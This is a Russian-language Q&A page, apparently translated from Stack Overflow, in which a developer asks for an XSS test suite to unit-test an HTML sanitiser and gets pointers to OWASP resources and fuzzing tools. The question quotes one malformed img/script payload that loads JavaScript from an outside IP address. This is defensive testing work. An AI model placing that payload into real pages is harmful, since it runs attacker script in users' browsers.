XSS Torture Test - существует ли он?

Question

Я хочу написать html sanitiser и, очевидно, чтобы проверить / доказать, что он работает должным образом, мне нужен набор примеров XSS, чтобы проверить, как он работает. Вот хороший пример из Coding Horror

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

Я знаю, что есть Mime Torture Test , который состоит из нескольких вложенных электронных писем с вложениями, которые используются для тестирования Mime-декодеров (если они могут декодировать его должным образом, то они доказали свою работоспособность). Я в основном ищу эквивалент для XSS, то есть список примеров хитрого html, который я могу бросить в мой дезинфицирующий аппарат, просто чтобы убедиться, что он работает нормально.

Если у кого-то есть и хорошие ресурсы о том, как написать дезинфицирующее средство (то есть, какие обычные подвиги пытаются использовать люди и т. Д.), Они также будут с благодарностью приняты.

Заранее спасибо: -)

Редактировать: Извините, если раньше это было непонятно, но я прошел набор тестов на пытки, поэтому я мог писать модульные тесты для дезинфицирующего средства, а не тестировать его в браузере и т. Д. Теоретически исходные данные могли прийти откуда угодно - не только браузер.

Answer 1

Посмотрите на этот чит-лист XSS: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Answer 2

XSS Me - отличный плагин для Firefox, который вы можете использовать против вашего дезинфицирующего средства.

Answer 3

Вы можете попробовать jsfunfuzz Джесси Рудермана (http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/), который выбрасывает случайные данные в ваш Javascript, пытаясь их сломать. Кажется, команда Firefox использовала это с большим успехом.

Answer 4

Выезд OWASP . У них есть хорошее руководство о том, как работает XSS, что искать, и даже о проекте WebGoat , где вы можете попробовать свои силы на уязвимом сайте.